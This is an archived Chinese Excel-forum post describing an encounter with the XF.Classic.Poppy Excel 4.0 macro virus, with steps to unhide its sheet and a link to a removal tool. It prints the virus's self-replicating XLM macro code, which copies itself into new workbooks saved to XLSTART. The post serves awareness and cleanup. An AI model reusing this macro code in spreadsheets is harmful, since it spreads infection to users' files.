ExcelTip.Net留存知识帖 ---【注:附件之前被网盘供应商清空后,现已修复-现已修复-现已修复为本地下载!】
现在位置:首页 > 我的酷贴 > 操作与技巧 > 亲历宏病毒及查杀

亲历宏病毒及查杀

作者:绿色风 分类: 时间:2022-08-18 浏览:94
楼主
gouweicao78
宏病毒专杀工具下载:
宏病毒专杀工具(boom作品).rar

前些日子打开一份文件,提醒要启用宏,以这么多年游荡于Excel社区的经验来说,印象中碰到过的宏病毒也就是Result,貌似没啥危害,一直没有多少提防的心理。但是打开工作簿之后,按ALT+F11进入VBE编辑窗口,却找不到任何代码,这就有些奇怪了。

关闭,重新打开,禁用宏,出现宏表4.0的提示““该工作簿中含有一种既无法被禁用又无法被签署的宏(Microsoft Excel 4.0版本宏)……”。由于工作较忙,未细致去理会。但几日来,打开Excel 2003的时候,经常无端多打开一个book1,或者一个sheet1的工作簿,里面仅有一张sheet1工作表,并且弹出“XF.Classic.Poppy  by VicodinES”、“?1998  The Narkotic Network”这类烦人的怪异的窗口,不得不引起重视。

查看方法
打开始作俑者那个工作簿,【格式】→【工作表】→【取消隐藏】,发现隐藏了一个“00000ppy”的工作表(Excel 4.0宏表),截图和其中代码如下(有兴趣的研究一下,我就不上传这份工作簿了,避免中毒者麻烦)。
【查杀工具】
下载
宏病毒专杀|免疫(CleanMacro)【最后更新20120416】




 
设备.xls=WORKBOOK.HIDE("00000ppy")
Book1
C:\Program Files\Microsoft  Office2003\OFFICE11\xlstart\Book1.**Auto and On Sheet Starts Here**
#N/A=RUN(C18)
=ERROR(TRUE, Continue)
=IF(A4=3)
Classic.Poppy by VicodinES=RETURN()
With Lord Natas=END.IF()
An Excel Formula Macro Virus  (XF.Classic)=ERROR(FALSE)
Hydrocodone/APAP 10-650 For  Your Computer=RUN(A21)
(C) The Narkotic Network 1998=ON.TIME("6:30:00 PM",  "Hello")
=ON.TIME("6:30:00 AM",  "Morning")
=ON.SHEET(,"Poppy",TRUE)
**** Payload**=RETURN()
=ALERT("XF.Classic.Poppy  by VicodinES", 2)
=ALERT("?1998  The Narkotic Network", 2)
=RETURN()**Set Our Values and Paths**
=SET.VALUE($A$3,(GET.WORKSPACE(32) &  "\xlstart\Book1."))
=SET.NAME("Document_array",  DOCUMENTS())
**Add New Workbook, Infect  It, Save It As Book1.xls**=SET.VALUE($A$1, INDEX(Document_array,2))
=SET.VALUE($A$2,INDEX(Document_array,1))
=ERROR(TRUE,MakeIt)=SET.VALUE($A$4,GET.DOCUMENT(3,"["&A1&"]"&"00000ppy"))
=IF(A21=0)=RETURN()
=RETURN()
=END.IF()
=NEW(1)**Infect Workbook**
=WORKBOOK.INSERT(1)=RUN(C19)
=WORKBOOK.INSERT(1)=ERROR(TRUE,Bust)
=ACTIVATE.PREV()=IF(A4=3)
=RUN(C18)=RETURN()
=WORKBOOK.COPY("00000ppy",A1)=ERROR(FALSE)
=WORKBOOK.NAME("Sheet3","Sheet99")=ACTIVATE.PREV()
=WORKBOOK.NAME("Sheet1","Sheet3")=RUN(C19)
=WORKBOOK.NAME("Sheet99","Sheet1")=WORKBOOK.COPY("00000ppy",A1)
=PROTECT.DOCUMENT(TRUE,,"VicodinES",TRUE)=END.IF()
=WORKBOOK.PREV()=RETURN()
=WORKBOOK.PREV()
=WORKBOOK.PREV()
=SAVE.AS(A3)=APP.TITLE("XF.Classic.Poppy")
=FILE.CLOSE()=MESSAGE(TRUE, "VicodinES and Lord Natas  greet you a good morning!")
=RETURN()=RETURN()

免责声明

有感于原ExcelTip.Net留存知识的价值及部分知识具有的时间限定性因素, 经与ExcelTip.Net站长Apolloh商议并征得其同意, 现将原属ExcelTip.Net的知识帖采集资料于本站点进行展示, 供有需要的人士查询使用,也慰缅曾经的论坛时代。 所示各个帖子的原作者如对版权有异议, 可与本人沟通提出,或于本站点留言,我们会尽快处理。 在此,感谢ExcelTip.Net站长Apolloh的支持,感谢本站点所有人**绿色风(QQ:79664738)**的支持与奉献,特此鸣谢!
------本人网名**KevinChengCW(QQ:1210618015)**原ExcelTip.Net总版主之一

评论列表
sitemap